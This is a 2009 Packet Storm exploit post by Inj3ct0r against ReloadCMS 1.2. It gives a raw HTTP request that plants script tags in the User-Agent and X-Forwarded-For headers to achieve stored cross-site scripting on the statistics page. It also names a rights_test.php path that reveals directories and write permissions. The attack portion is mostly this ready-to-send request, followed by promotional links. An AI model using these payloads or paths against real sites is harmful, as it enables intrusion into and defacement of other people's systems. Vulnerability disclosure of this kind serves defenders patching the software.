ReloadCMS 1.2 Cross Site Scripting

2009-09-01T00:00:00
ID PACKETSTORM:80856
Type packetstorm
Reporter Inj3ct0r
Modified 2009-09-01T00:00:00

Description

                                        
                                            `======================================================================  
ReloadCMS 1.2.* Xss Exploit + (view directories and write permissions)  
======================================================================  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 0  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1  
  
#[+] Discovered By : Inj3ct0r  
#[+] Site : Inj3ct0r.com  
#[+] support e-mail : submit[at]inj3ct0r.com  
  
  
site: reloadcms.com   
Vulnerable products: ReloadCMS 1.2 .*  
  
  
-----------------------------------  
Xss Exploit: (statistics site)  
-----------------------------------  
  
GET / HTTP/1.0  
User-Agent: <script>alert('inj3ct0r.com')</script>  
X-Forwarded-For: <script>alert('inj3ct0r.org')</script>  
Host: localhost  
Connection: close  
  
--------------------------------------  
  
View directories and write permissions  
  
--------------------------------------  
  
Example:  
Êîä:  
http://site.com/path_to_cms/tools/rights_test.php  
  
  
----------------------------------------------  
  
ThE End =] Visit my proj3ct :  
  
http://inj3ct0r.com  
http://inj3ct0r.org  
http://inj3ct0r.net  
  
  
# ~ - [ [ : Inj3ct0r : ] ]`